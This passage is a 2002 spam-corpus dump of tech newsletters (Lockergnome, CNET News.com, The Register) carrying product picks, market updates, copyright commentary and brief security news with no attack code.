their end, which means you won't have to wait to find out what's next; 
you can simply click to the next page. Mark Pilgrim, the site's creator, 
sets the stage with 5 characters (all of which could easily represent 
real people) and walks through their physical, mental, and technological 
limitations. Following the character introductions, Mark walks through 
an accessibility scenario each day and then relates the concept back 
specific benefits for each character's limitations. Solutions are 
presented with blogs in mind, but with very little extrapolation you'll 
be able to make every site you design more user friendly.
Â GnomeBLOG
Backend.UserLand.Com
http://backend.userland.com/I've been using Radio from the moment I finally got around to creating 
a blog. The software keeps things simple and automatically updates 
itself when new things get added. Userland goes far beyond creating a 
desktop interface for their blogging system though. They've fully 
documented all the XML, XML-RPC, and SOAP tie-ins used to connect to 
their network, which could easily be adapted to other content 
management applications with some XML knowhow. Backend is the place to 
look "under the hood" at Userland's XML inner workings, including 
detailed documentation on making everything work. If you've got 
modifications or improvements to the system, they have an open 
discussion forum for trading ideas.
http://www.lockergnome.com/issues/webmasterweekly/20020712.html
Your subscribed e-mail address is: [qqqqqqqqqq-lg@spamassassin.taint.org] - To unsubscribe or change your delivery address, please visit the subscription management page. For further information, please refer to the GnomeCREDITS in the sidebar.
LOCKERGNOME
Â Download Our Tip FilesÂ Latest Windows Daily
Â Latest Digital Media
Â Latest Tech Specialist
Â Latest Penguin ShellÂ Latest Apple Core
Â Latest Web Weekly
Â Latest Bits &amp; Bytes
Â Latest Audio Show
Â Low Price Search
Â $99 Tech ConferenceÂ The GnomeSTORE
Â Tell a Friend About Us!
Â Suggest a Feature
Â Advertise With Us
Â High-Tech Job Search
Â Chat With Gnomies
Â Watch The WebcamsÂ Computer Power UserÂ Read Past Issues
Â Download X-Setup
Â About Lockergnome
Â Our Privacy Policy
Â View More Options
Â Our XML / RSS Feed
Â Syndicate Our TipsÂ Link To Lockergnome
Â Get Chris's Book
Â General Feedback
Â E-mail the Editor
Â Jake's BlogÂ Our XML / RSS Feed
Â Syndicate Our Tips
Â Link To LockergnomeÂ SOUND SYSTEMS
Yamaha RX-V1200
Sony DAVC900
Harman Kardon	AVR520
Denon	AVR5803
Pioneer VSXD811S
Pioneer Elite	VSX49TX
Sony HTDDW840
Yamaha HTR5560
BOSE LS122BK
Sony DAVC450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smoother?Â 
LOOK IT UPÂ 
CREDITSÂ©2002, Sausage Software and Lockergnome LLC. All Rights Reserved. Nathan Allan, the Sausage Crew and Lockergnome Lunatics spin all the content. Please read our Terms of Service.Â Â Search Past Issues:
Â 
GETTING PAID WHAT YOU ARE WORTH? Change your career - or get a better one! Your dream job could be a mouse click away. Visit our job search page for a position with a future. Find a new career today!</t>
  </si>
  <si>
    <t xml:space="preserve">Canning spam without eating up real mailÂ Search
	                Â 
	                Â 
News.com
	                All CNETÂ Â Â Â 
	                The Web
                Â Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 12, 2002Canning spam without eating up real mailTech companies chase homeland securityLukewarm response to Juniper movesUSA Today investigating hack attackWeb services made easier?Wireless lands at European airportsÂ Vision Series			Read News.com's exclusive interviews of 10 top CIOs.
Vision Series home
Canning spam without eating up real mailLike a growing number of Web surfers, Audrie Krause faces a new uncertainty when she hits the send button on her e-mail these days: Will the message get through?
As the head of a political action group, Krause uses members-only e-mail lists to help educate and organize fellow activists. So she was jarred recently when one message bounced back with a note accusing her of spreading unsolicited junk e-mail, or spam.
July 12, 2002, 4:00 AM PT
 | Read Full Story Tech companies chase homeland securitySoftware companies looking for greener pastures are turning to the red, white and blue.
Whether out of heartfelt patriotism in the wake of Sept. 11 or the desire to tap into the nearly $38 billion budgeted for homeland security spending in 2003, many information technology companies that previously paid little attention to government contracts are now going to great lengths to attract government business.
July 12, 2002, 11:20 AM PT
 | Read Full Story Lukewarm response to Juniper movesJuniper Networks continues to muddle through the telecom morass.
Juniper beat estimates by earning less than $500,000, reported a 42 percent decline in year-over-year sales and offered little hope that it could grow its business when it reported 2002 second-quarter earnings on Thursday. Yet in some corners of the industry, Juniper's performance was viewed as mildly positive.
July 12, 2002, 12:00 PM PT | Read Full Story 
USA Today investigating hack attackNational newspaper USA Today said Friday that one or more online vandals had posted a fake front page and six phony news stories on its Web site.
Network administrators have yet to determine how the vandals compromised the company's Web server Thursday night. The national newspaper has called in local law enforcement to help find out who defaced the site with fake stories.
July 12, 2002, 11:45 AM PT
 | Read Full Story Web services made easier?The Web's leading standards group has updated its core draft specification for Web services.
The World Wide Web Consortium (W3C) this week published Web Services Description Language (WSDL) 1.2, a language based on XML (Extensible Markup Language) that defines the protocol for interactive services on the Web, as well as their data and location.
July 12, 2002, 11:40 AM PT
 | Read Full Story Wireless lands at European airportsNetwork giant Cisco Systems is installing Aironet wireless LANs into lounges at 19 airports across Europe, targeting business travelers with wireless cards in their laptops or personal digital assistants.
The announcement includes various deals with different telecommunications companies and airports, made under the banner of Cisco Mobile Office, a campaign for wireless LANs (local area networks). The airport deals are at different stages, from a fully fledged paid-for service run by wireless provider Mobynet at Turkey's Ataturk Airport in Istanbul, where the wireless LAN was included when the airport was designed in 1999, to others that are still free trials.
July 12, 2002, 11:15 AM PT
 | Read Full Story 
From our partners:Too many rotten applesBusiness Week
Will Bush's reforms be enough to calm the Investor Class?
July 15, 2002 issue
 | Read Full Story Making sense of irrational exuberanceBusiness Week
A University of Chicago economist says investors' manic behavior during stock market bubbles may not be as crazy as it seems.July 12,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Shoot and groove with Casio's slim camera
Correspondent Melissa Francis takes a look at the new Casio digital camera that's the size of a credit card and can record  and play music in the MP3 format.
 Watch Video
Â Â EnterpriseMerger means bigger bag of chipsEuropean PC sales take another dipRivals help improve Dell's outlookE-BusinessStocks mixed as techs offer some gainsAsian travel portal takes offN.Y. subpoenas PayPal over gamblingCommunicationsMore government eyes on QwestBroadband: U.K. sees doubleEbbers said to know books cookedMediaAOL on the hunt for new CEOAsia proves sweet spot for YahooDoubleClick's new focus leads to profitPersonal TechnologyApple goes overseas with retail storeSony shrinks its Memory StickChips, LCDs give clue to Philips' health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</si>
  <si>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
CNET Shopper Newsletter: Sound &amp; Graphics EditionShopper
											All CNET
											The Web
										Â 
									1
Cyber Shot DSC-F707
2
Canon PowerShot S40
3
Palm m515
4
Nikon Coolpix 995
5
Canon PowerShot G2
Â 
		All most popularLive tech help NOW!
May's tech award
1 million open jobs
News.com: top CIOs 
ZDNet: PeopleSoft 
Is your system acting a bit sluggish?
										Adding memory is an easy way to get the most out of your
favorite game and graphics applications, but figuring out 
what type to buy can be a difficult and frustrating proposition. CNET's all-in-one Check out CNET's new Memory Configurator makes finding the perfect 
memory easy! Whether you're searching for desktop, notebook, 
camera or PDA memory, your just a few clicks away from the 
memory you'll need to make the most of your graphics hardware
and software.Check out CNET's new Memory Configurator
Leadtek WinFast A250 Ultra TD
								â€¢ 128 MB DDR SDRAM
								â€¢ GeForce4
								â€¢ Dual display support
								Â Â Just $299ATI All-In-Wonder Radeon 8500DV 
								â€¢ All-in-one 3D, TV and video
								â€¢ 64MB DDR, Tv-On-Demand
								â€¢ Capture images and video
								Â Â Just $230PNY Verto GeForce4 Ti 4600 
								â€¢ 128 MB DDR SDRAM
								â€¢ GeForce4
								â€¢ AGP 4x 
								Â Â Just $304VisionTek Xtasy 6964
								â€¢ Vertex &amp; Pixel shaders 
								â€¢ 64MB DDR, 2048x1536 at 75Hz 
								â€¢ GeForce3 Ti500 chipset, AGP
								Â Â Just $141ATI Radeon 7500 
								â€¢ Dual display support
								â€¢ 64MB, 2048x1536 res., TV out 
								â€¢ Full DirectX 8.1 support
								Â Â Just $82 
Did you know that ChannelOnline empowers you to compare 
detailed product specifications feature-for-feature? Select the items you wish to compare from your customer-
specific catalog of more than 250,000 SKUs. The product 
comparison highlights differences between the products 
in red, allowing your sales reps and customers to easily 
identify the main differences between each product selected. 
This comparison can then be e-mailed to your customers to
assist them in making a more informed buying decision.Sign up now to gain access to the most complete, accurate,
and timely product data available. 
Tell me more about ChannelOnline.
Tech Trends
Hardware
Software
Shopping
Downloads
News
Investing
Electronics
Web Building
Help &amp; How-Tos
Internet
Games
Message Boards
CNET TV &amp; Radio
Music CenterThe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</si>
  <si>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CNET Investor Dispatch
Quote LookupEnter symbol:Â· Symbol Lookup
Quotes delayed 20+ minutes
â€¢ My Portfolio
â€¢ Broker Reports
â€¢ IPOs
â€¢ Splits
â€¢ Messages
Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 12, 2002 DJIA8684.53 Â -117.00
 NASDAQ1373.49 Â -0.94
 S&amp;P 500921.39 Â -5.98
 CNETÂ TECH990.00 Â -5.12CNET News.com Vision SeriesRead News.com's exclusive interviews of 10 top CIOs.Vision Series home
Techs fall with consumer sentiment
A drop in the University of Michigan's consumer sentiment index helped put a dent in technology shares Friday.Despite Dell Computer raising its outlook and better-than-expected earnings from Juniper Networks, CNET's Tech index slipped 5.12 points, or 0.51 percent, to 990.0. The tech-packed Nasdaq composite index edged down 0.94 points, or 0.06 percent, to 1,373.49.Broader markets also fell, as investors shrugged off news of better-than-expected retail and food services sales in June. The Dow Jones industrials shed 117 points, or 1.33 percent, to 8,684.5--its fifth straight losing session. The S&amp;P 500 lost 5.98 points, or 0.64 percent, to 921.39.
Rivals help improve Dell's outlook 
Dell Computer on Thursday raised its revenue and earnings outlook for the second quarter, saying it continues to gain market share from computer rivals.
The company said it now expects revenue for the quarter that ends Aug. 2 will reach $8.3 billion, up about 9 percent from last year's second quarter, with earnings of 19 cents per share. On May 16, the company predicted revenue would hit $8.2 billion and projected earnings at 18 cents per share.DELL COMPUTER CORP 24.98 4.39% Lukewarm response to Juniper moves 
Juniper Networks continues to muddle through the telecom morass.
Juniper beat estimates by earning less than $500,000, reported a 42 percent decline in year-over-year sales and offered little hope that it could grow its business when it reported 2002 second-quarter earnings Thursday. Yet in some corners of the industry, Juniper's performance was viewed as mildly positive. JUNIPER NETWORKS 7.70 6.65% Asia proves sweet spot for Yahoo
Web portal Yahoo, which broke a long streak of losses in the second quarter, said it hopes to ride on Asia's acceptance of online advertising and focus on wireless content to boost its regional business.
"Asian advertisers who use traditional media like newspapers and TV are moving more into online ads as they see the value and efficiency that it delivers," Niren Hiro, Yahoo's general manager for Southeast Asia, said in an interview Thursday. "That's why we've seen in the last quarter clients who have traditionally stayed away from new media like us starting to divert their budgets in our direction."YAHOO INC 12.9400 0.15479876% 
Also from CNET
Real-time stock quotes from CNET News.com Investor.30-day free trial!
J.P. Morgan downgrades Powerwave Technologies to "long-term buy" in tech notes 7/12/02 
Analyst Ed Snyder lowers his rating from "buy" despite a strong quarter from the wireless communications gear maker. Powerwave has a diversified customer base and fewer competitors now, Snyder suggests. But he cuts his estimates and rating based on lower guidance from the company, weak third-generation (3G) wireless network orders, and likely cuts in carrier capital expenditures. The infrastructure market remains lumpy and hard to predict, Snyder says.POWERWAVE TECHNOLOGIES 6.61 -13.03% 
Visit the Brokerage Center
AOL on the hunt for new CEO 
AOL Time Warner has begun casting a net for a chief executive for its beleaguered America Online division.
The move comes as no surprise. Former AOL CEO Barry Schuler stepped down from the position in April. But it raises questions about the future of Robert Pittman, AOL Time Warner's chief operating officer and the interim head of AOL. Pittman had been charged with fixing the division. As previously reported, sources in the company speculate that Pittman will not return to his duties as COO once he completes his stint at AOL.AOL TIME WARNER INC 13.14 -4.09%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qqqqqqqqqq-cnet-newsletters@spamassassin.taint.orgUnsubscribeÂ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</si>
  <si>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THE WEEK IN REVIEW: Quit copyingÂ Search
	                Â 
	                Â 
News.com
	                All CNETÂ Â Â Â 
	                The Web
                Â Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftCNET | NEWS.COM WEEK IN REVIEW
The Entire Tech Week in a Single Email
Saturday, July 13, 2002
If you've ever taped a "Seinfeld" episode or traded music online, Uncle Sam may want you--to stop.
Draft legislation that is winding its way through Congress would sharply limit Americans' rights relating to copying music, taping TV shows and transferring files through the Internet. The first part of their proposal, which would limit backup copies, has drawn objections from academics and nonprofit groups that have reviewed it.Under current copyright law, Americans who record a TV program or radio segment generally may "sell or otherwise dispose of" that analog recording or digital file as they wish.The proposed bill would end that exemption, handing copyright owners substantial new control over the distribution of their works by curtailing a consumer's right to copy material under a doctrine known as "fair use."Another salvo in the copyright battle was delivered when a federal judge said that record labels and film studios could expand an ongoing copyright lawsuit to include Sharman Networks, which distributes the popular Kazaa software.The Recording Industry Association of America and the Motion Picture Association of America last October sued three prominent file-swapping companies in Los Angeles federal court. The suit named Morpheus parent StreamCast Networks, Grokster and Kazaa BV, the Netherlands-based company that originally created the Kazaa software.However, in February, Kazaa BV sold the Kazaa file-swapping software to Sharman, a company later revealed to be based in Vanuatu, a small island in the South Pacific. The recording and movie industry trade groups asked permission to add that company to the lawsuit in June. A judge ruled this week that Sharman could be added to the lawsuit.
Shoring up U.S. security Computer security is becoming increasingly critical to President Bush's proposal for a homeland defense department. When Bush formally proposed the department last month, he never mentioned the Internet or so-called cybersecurity. But as Capitol Hill scrutinizes the proposal, politicians are fretting about tech-savvy terrorists--and insisting any new agency must shield the United States from electronic attacks as well. House Republicans have asked committees for any suggested changes to the White House-backed bill by the end of the week.Included in the proposal are radical changes for the U.S. government's Internet defenses. The plan would stitch together nearly all computer protection functions, from the Commerce Department's Critical Infrastructure Assurance Office to the Computer Security Division of the National Institute of Standards and Technology to the Federal Computer Incident Response Center.Additionally, the proposed department is likely to get its own privacy czar. A draft of the legislation seen by CNET News.com states that the Secretary of Homeland Security must appoint a privacy officer to ensure that new technologies "sustain and do not erode" privacy protections and to verify that the agency's massive databases operate within federal guidelines.
Who's running your computer? Perhaps a more immediate security concern to individuals is what is going on now with their computers.Apple Computer OS X users could let hackers piggyback malicious code on downloads from the company's SoftwareUpdate service.  According to the BugTraq mailing list, a hacker named Russell Harding has posted full instructions for how to fool Apple's SoftwareUpdate feature to allow a hacker to install a backdoor on any Mac running OS X.The exploit takes advantage of SoftwareUpdate, Apple's software updating mechanism in OS X, which checks weekly for new updates from the company. According to Harding, who claims to have discovered the exploit, the feature downloads updates over the Web with no authentication and installs them on a system. So far, there are no patches available for this problem.Users of Microsoft's Internet Explorer, Outlook and Outlook Express applications may be vulnerable to a recently discovered software flaw that could leave their system open to malicious code carried on Web pages or in e-mails. A security researcher and partner at risk-assessment company PivX Solutions warned that HTML objects embedded in Web pages and e-mail could carry code that allows an attacker to check out victims' cookie files, read their documents and execute programs on their computer.Still another problem is plaguing Outlook: A popular plug-in that lets users encrypt and digitally sign messages has inadvertently weakened security and left the mail program open to attack. Security company eEye Digital Security issued a warning late Wednesday to users of Network Associates' Pretty Good Privacy (PGP) plug-in for Outlook, saying that a vulnerability in the add-on could let attackers execute malicious software on a victim's computer.
Wi-Fi everywhere, but not everyoneOne of the first cameras that can shuttle photos and videos using the Wi-Fi wireless networking technology has made its debut. IQinVision plans to sell the camera to companies such as security firms that need to put video cameras in places where wires can't go, or as a way to quickly install a temporary security system.This product is among the first devices to combine digital videography and wireless LANs (local area networks) that use the Wi-Fi, or 802.11b, standard. Expect more digital camera makers to follow suit. The number of digital cameras has been on the rise, and it's only a matter of time before a camera maker wants to add a popular new technology like Wi-Fi.Wi-Fi is also invading handheld devices. Wireless equipment maker Intersil is working with SyChip to incorporate 802.11b wireless networking technology into a Secure Digital (SD) card for handheld devices. The card, which should be available to manufacturers for testing in the fourth quarter, lets handheld owners add and remove wireless networking capabilities to handhelds that contain an SD slot from Palm, Hewlett-Packard and other companies.Wireless SD cards would make it far easier for handheld manufacturers and owners to get these devices linked. Only a few handhelds include wireless capabilities, and they are some of the most expensive on the market. With the card, wireless access becomes an option for many.Not everyone is pleased with the explosion in popularity of wireless networking. Broadband providers are cracking down on some customers, threatening to cut service to those who set up the inexpensive wireless systems and allow others to freely tap into their Internet access.After being introduced just a couple of years ago, so-called Wi-Fi "hot spots" that tap into cable or digital subscriber lines (DSL) are now in at least 15 million homes and offices. The problem is that one paying subscriber can set up a local network that allows several other people to access the Net, for fun or for profit.
News.com special focus: ChinaAs China's society changes and its education system matures, the country is becoming a major consumer and producer of computer products. And as the global recession leaves few fertile opportunities elsewhere, China has emerged as a primary target for foreign business. A News.com three-part special report examines the various reasons that this may eventually be known as China's high-tech century.
Also of noteApple Computer plans to serve up a new iMac model with a larger flat-panel display during next week's Macworld Expo trade show...Microsoft joined the growing customer relationship management market by previewing its first CRM product...America Online has quietly been testing an update to its popular AOL Instant Messenger, using graphics to create personal looks reminiscent of Yahoo's chat features...Federal regulators deactivated hundreds of thousands of credit cards belonging to former customers of NextCard...IBM's hard drive business, which the company is selling to Hitachi, lost $515 million in the five most recent quarters...Yahoo reported its first profit in six quarters but found it difficult to assuage analysts' concerns about its core advertising business.Want more? Check out all this week's News.com headlines.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</si>
  <si>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20020712 Lockergnome Windows Daily
Â  07.12.2002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My mom just notified me of my aunt Theresa's death. She was my
father's older sister, though I only knew her through a few e-mail
exchanges and a couple of brief encounters as a child. This news
came hours after I received ANOTHER bit of disturbing news:
"Please tell Chris that one of his first fans died last weekend of
a heart attack at home." I first met Jon Snyder at an Apple user's
group meeting a couple of years ago; to me, he always looked like
a beefier Robert Beltran. Death is something we all must deal
with, but you never seem to be prepared for it when someone
actually dies. A few months ago, Aunt Theresa sent word that she
had seen my show. It was good to know that even though we hadn't
interacted much over the past few years, she was still able to see
me on TV. And even though you didn't know him, you're closer to
Jon than you realize. Witness this message he sent to his boss a
few months ago:
"I evangelized for months last year for having our company at
the first of these consumer computer conferences in Des Moines
last October, but got shot down. The conference was a hit despite
being postponed by 9/11, and having to move the venue at the last
minute. I know... I was there. So, I'm starting all over again
being 'pushy' about our presence at this event in August of this
year. Chris Pirillo, whose Des Moines-based commercial email
publishing group 'Lockergnome' puts this conference together, is a
friend of mine. He was the 'kid' hired by TechTV to host their
Call for Help daily TV program in SF starting last fall. If you
get the Dish network or Mediacom cable you can catch his show. I
have my DishPlayer set up to record his show on a daily basis.
It's VERY well done, as is TechTV as a whole."
I returned from speaking to another user group the other night and
found that approximately 100 new GnomeTomes had been ordered.
Sweet! When I started looking closer at the numbers, I realized
that Jake was offering his Converting
Vinyl LPs to CD eBook for free - and that's all anybody was
taking. No, seriously - five hundred orders later, and 99% of them
were just for that particular title. Now, while I don't have a
problem with Jake's offer, I do want to encourage you to check out
the non-free titles (and if you've already looked, please
look again). A lot of blood,
sweat, and tears went into them - and they're just as helpful. In
fact, Jake's also written one for OS X (which
probably wouldn't impress you if you weren't using an Apple
machine). Although, I'm sure plenty of you use
Dreamweaver.
Which reminds me: Jake's also now authoring our Webmaster Weekly
newsletter. So, if you haven't read that in a while, I'd encourage
you to give it another glance. After all, as Elwood
Edwards so finely said: You've
Got Lockergnome! Thanks to David
Lawrence for making that MP3 a reality. El can make one with your
name, too. And yes, that's the AOL guy.See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Chris PirilloÂ Â Â Â Â Â Â 
Â GnomeDOWNLOADS
VLINK v0.6.8.0 [257k] W9x FREEhttp://www.vxtech.org/{Desktop link manager} Nothing gets you there faster than a link.
I mean, imagine if while you're surfing, you had to stop and type
in a URL every time you wanted to move to a new page. Simply
unacceptable. So why not have that convenience when working with
other files? This application gives you the option of opening or
running any file or program you desire via links. You can also
shut down your computer or disable your screensaver through this
program. "No installer is required for VLink - it will not change
any of your registry settings or other Windows settings; simply
extract the files PowerLink.dll and VLink.exe to a directory and
run it."
GhiaTracker v1.5 [370k] W9x/2k/XP FREEhttp://homepage.mac.com/karmannghia/ghiatracker/{Learn about your Ghia} Gearheads, motorheads, call them whatever
you will, but I've never been part of their ranks. Not that I
don't like cars, mind you; I find them much more useful than pogo
sticks. If you happen to own a little vehicle known as the Karmann
Ghia, you should drive on over and download this program. Click on
any year between 1956 (the year it went into production) and 1974
to get a brief synopsis of the car and its changes for that year.
You can also get other specifications such as torque, horsepower,
compression, etc. Even if you're not "into" cars, check this out.
This program was created for use on the Mac, but a Windows version
is also available.Recommend It!
Â GnomeCLICKS
Â GnomeSYSTEM
WebTV Viewer v2.6 [6.8M] W9x FREEhttp://developer.msntv.com/tools/viewer/"Preview your sites on WebTV without leaving your PC! The WebTV
Viewer simulates WebTV on your system. Read the online Viewer
Installation Guide to find out more on how to use this software.
Important: the PC version of the WebTV Viewer (2.6) reflects all
of the features of the most recent upgrade from Spring 2001. Note:
The Viewer is similar, but not identical, to a real WebTV system.
The WebTV Viewer program is currently beta-level software on both
Windows and Macintosh. This means that it has not been completely
tested and debugged. The WebTV Viewer is like a WebTV browser
because: it changes page layout by compressing page width and
enlarging text; and it supports HTML, JavaScript, as well as other
Internet standards in the same way. The WebTV Viewer is not like a
WebTV browser because: your computer monitor has a higher
resolution than a television screen, and displays color better;
and the Viewer does not support email or audio, while the WebTV
browser does."
Recommend It!
Â GnomeWILDCARDFull PDF Books
Poor Richard's Web
Internet Promotions
E-Mail Publishing
Web Site Makeover
Websites Made Easy
Online Communities
Home Networking
Internet Recruiting
Online BrandingThe Evidence is Against You
Scribbled by Jim GirardEvery time some new technology has expanded free access to popular
music, starting with radio broadcasts of recorded songs in the
1930s, the recording industry has fought it - claiming that it
would cost them money. And every time, it has resulted in
increased sales. The best-known example, of course, was the
advances in tape cassette technology in the 60s and 70s, including
Dolby sound technology. As with MP3, this technology was opposed
by the music industry as different from previous such
developments, because it made it possible for ordinary people to
create their own copies at near-professional quality. The actual
result was the creation of a whole new profit center for the music
industry - pre-recorded cassette tapes - which actually became
more popular than vinyl for a while (before the advent of CD
technology).The thing is, the music industry is well aware of this effect -
 and they are not really aiming to stop the private exchange of
songs in MP3 format. If that were their goal, they'd be
instituting widespread, aggressive legal actions against all the
server-centered nodes (as they did against all radio stations
playing their music in the 30s, when they really thought the
phenomenon was going to wipe them out). Instead, they have focused
on the best-known services - first Napster, then Morpheus, KaZaA,
and most recently, Audiogalaxy. Even in those cases, they've
limited their legal challenges to things they know they can win -
 and they've avoided actual court trials whenever possible (to
avoid the possibility of setting some damaging precedent).The point that seems to escape a lot of people is that copyright
is not a property in the same sense as most of the things we think
of as property. One key difference is that if you don't defend it,
you lose it. If you left your car sitting in the driveway, with
the window open and the keys in the ignition, and somebody drove
away in it, that would still be theft - and you'd still be
entitled to get your car back. Not so with copyright. If you are
aware of infringement and you do nothing to try to stop it, you
are voluntarily allowing it to enter the public domain. It's for
the same reason that big companies insist that newspapers put a
copyright or trademark symbol after the names of their products
whenever they're mentioned, and not use words like "Coke" or
"Kleenex" as generic terms. They don't really expect everybody to
do what they say - and they're well aware that having the name of
one's product become the generic term for a product is actually a
great marketing boon. But if they DON'T do that, someone at some
point could start using the word on their own product, arguing
that it is in the public domain.The efforts of the music industry are not aimed at actually
stopping the exchange of music between individuals - which they
know from long experience, increases their sales because most of
the people who normally buy the music aren't really satisfied with
near-perfect copies. For most of them, the learning curve and the
cost in time of creating those copies themselves outweighs the
cost of simply buying the CD. Most of the outright piracy is
committed by people who wouldn't have bought the music in the
first place. What the music industry is doing is clearly aimed at
establishing a public record of their efforts to defend copyright,
in the broadest, most public way; to prevent anyone from making a
legal claim that the stuff they own has entered the public domain.
The thing they're really worried about, in terms of profits, is
the change in the marketing model. Even legitimate online music
commerce threatens the album format, with its traditional mix of a
few good songs and a bunch of others most people wouldn't pay for
if they were buying the stuff song by song. The problem is how to
make as much money on a per-song basis - and, at the moment, it
requires charging far more for an individual song that most people
are willing to pay.At any rate, copyright is actually a fairly complex matter of
civil law, with a good deal of history behind it - dating back to
the Renaissance. The strategies music companies use are clearly
directed to realities and necessities, in light of history and
case law. They have also done a great PR job, convincing the most
technically knowledgeable people on the Internet that it is a
simple moral or criminal issue. "Common sense" tells a lot of
people that copying music without paying for it is just like
stealing someone's car, and represents a loss to the owner. But if
common sense could decide the issue equitably, we wouldn't have
the law in the first place. Most of our great intellectual
systems, including not only law but science, are designed in large
part to overcome the errors of common sense, and that is more the
case in civil law than criminal. The people who work within those
systems are well aware of that, but they are also well aware that
most people aren't - and that it can work to their advantage. Any
time a highly paid civil attorney begins by telling you that an
issue vital to his client is actually very simple, or just a
matter of common sense, there's a very high probability that what
he means is that it's to his clients advantage if people like you
believe that. If it really WERE that simple, the client wouldn't
be paying him as much as he is.Submit Your Thoughts | Recommend It!A BOOK FOR EVERY GEEK: Want to know more about networking? Have you ever wanted to write an e-book? Maybe you need to polish your Web design skills? Get full-length books from the Poor Richard's series, including Poor Richard's E-mail Publishing, by Chris Pirillo, at GnomeTomes.com, for 50% off the suggested retail price of the print versions. Click here to learn more.    Â GnomeFAVORITE
My Virtual Modelhttp://www.myvirtualmodel.com/{Make a model of you} Wouldn't it be cool if you could physically
walk into cyberspace? Well, you can't... so stop thinking about
it. However, you can design a virtual model of yourself on this
site. Choose your features like body shape, eyes, nose, lips,
facial hair, height, and weight. The amazing thing is how closely
your model resembles you. My only complaint is that you can't add
glasses. How in the heck is my digital doppelganger supposed to
see? Once you're finished, the site can even offer style advice
for your body type. (I'll stick with plaid, thank you very much.)Recommend It!
Â GnomeTIPOur Tip eBooks
Microsoft Office Tips
PC Productivity Tips
Cool Internet Tips
Windows 2000 Tips
Windows XP Tips
Top 50 Fun Sites
Must-Know Terms
Top 50 Useful Sites
Top 75 Tech SitesWho has no trouble with controling his codes? Lockergnomie Wayne
Smith: "Here is a bit of information specifically for Hotmail
users who may have trouble opening your links, due to the service
wanting to place the referred URL in a separate frame. I receive
my Lockergnome newsletters via Hotmail and find it really useful
when you folks include the link as text. However, sometimes this
isn't practical - or it stops the flow of the article. The trouble
here is that the link sometimes returns the message: 'There was an
error displaying this link' in the frame. No problem! Right-click,
copy shortcut, paste to metapad (freeware from LIQUIDNINJA.COM),
then do a global search and replace. The trick is to replace the
control codes with the correct characters: %26 is an ampersand;
%3a is a colon; %2e is a period; %20 is a blank space; %2f is a
forward slash; %3d is an equals symbol; %3f is a question mark.
The Windows character map can help with any others. Select a
character, look at the status bar, replace 'U+[code]' with the
percent sign. In other words, the ampersand (U+0026) is %26 which
translastes into a '&amp;' symbol. Maybe a more clever Gnomie can come
up with some script which we can place in the 'Web' folder,
correctly register, and use in IE's right-click / context menu?"Recommend It!http://www.lockergnome.com/issues/daily/20020712.html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
Â Latest Audio ShowÂ Low Price Search
Â $99 Tech ConferenceÂ The GnomeSTORE
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BookÂ General Feedback
Â E-mail the Editor
Â The Editor's Blog
Â MP3 SOFTWARE
Havas MP3 Pro
Magix MP3 Maker
Ejay MP3
Audiostation 5.0
Jack The MP3 Ripper
Pearson MP3 Maker
Steinberg My MP3
MusicMatch Jukebox 7.0
Hip Hop E-jay Record
MP3-Wolf
MP3 Maker Gold
The MP3 Wizard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the story of the ugly shoe unfold before our very eyes. This footwear was outcast from the group weeks ago, and has been very depressed ever since. Pity my shoe.The Lone Shoe
Â 
CLICK HERE TO ZOOMÂ 
BYTE ME NOWÂ©2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered at DNS Central.
I'd feel better about doctors if it wasn't called a 'Practice.'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</si>
  <si>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Ogg Vorbis goes gold
    Sounds good
        http://www.theregister.co.uk/content/4/26176.html    Norwegian gov ditches contract with Microsoft
    'Unfortunate deal,' says minister
        http://www.theregister.co.uk/content/4/26172.html    MS to use PEAP for home wireless security?
    It's tagged as a possible for a 'future XP client'
        http://www.theregister.co.uk/content/4/26170.htmlEnterprise Systems    EMC And Accenture - The Switzerland of Storage
    Vendor independent consulting
        http://www.theregister.co.uk/content/53/26163.html    IBM sell first Regatta-H iSeries monster server
    Customer wants four - didn't TJ Watson say something about that once?
        http://www.theregister.co.uk/content/53/26161.html    Nanotechnology may be over-hyped 
    Small-minded nonsense
        http://www.theregister.co.uk/content/53/26150.htmlPersonal Hardware    Sharp Linux handheld in double bug alert
    Zoinks!
        http://www.theregister.co.uk/content/54/26168.htmlInternet    RedHotAnt boss jailed for 5 years 
    Worldcom, Level 3 stung in ISP collapse
        http://www.theregister.co.uk/content/6/26175.html    Three domain name scams
    Bogus renewals, bogus directories
        http://www.theregister.co.uk/content/6/26167.html    KPNQwest heads for final shutdown
    Good bits sold, customers gone, goodnight then
        http://www.theregister.co.uk/content/6/26160.htmlNet Security    Linux attacks on the rise?
    Anecdotage
        http://www.theregister.co.uk/content/55/26177.html    Sharp Linux handheld in double bug alert
    Zoinks!
        http://www.theregister.co.uk/content/55/26168.html    USA Today swats hack attack - but not entirely
    Er, you missed a bit...
        http://www.theregister.co.uk/content/55/26157.htmlBusiness    EU recycling rules to hit PC makers 
    Rubbish
        http://www.theregister.co.uk/content/7/26173.html    Fujitsu plans cuts, predicts two more years to recovery
    CFO paints gloomy picture
        http://www.theregister.co.uk/content/7/26159.html    Dell ups Q2 forecasts
    Different planet, obviously...
        http://www.theregister.co.uk/content/7/26158.htmlNetworks    One in ten workers squeezed out at Juniper
    Financial results are healthier, though
        http://www.theregister.co.uk/content/5/26164.htmlBroadband    UK broadband take-up doubles
    Ooooooooooh!
        http://www.theregister.co.uk/content/22/26171.html    BTo in business broadband promo 
    Strings attached naturally
        http://www.theregister.co.uk/content/22/26169.htmlBOFH: Whole Shebang    BOFH and the God of Workplace Harmony
    Episode 14 Sacrifices must be made
        http://www.theregister.co.uk/content/30/25955.htmlSite News    Cash'n'Carrion down for stocktake
    Back on Monday, proceeded by fanfare of trumpets
        http://www.theregister.co.uk/content/31/26178.html    Calling all Reg Hackerettes
    Vulture Central seeks guidance on sizeable problem
        http://www.theregister.co.uk/content/31/26174.html    Get your Reg logos here
    Full set of gif images for your viewing pleasure
        http://www.theregister.co.uk/content/31/26166.html    Last call for Star Wars console competition
    Closes Monday, so get your skates on
        http://www.theregister.co.uk/content/31/26162.html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</si>
  <si>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
Buyers Alert Announce
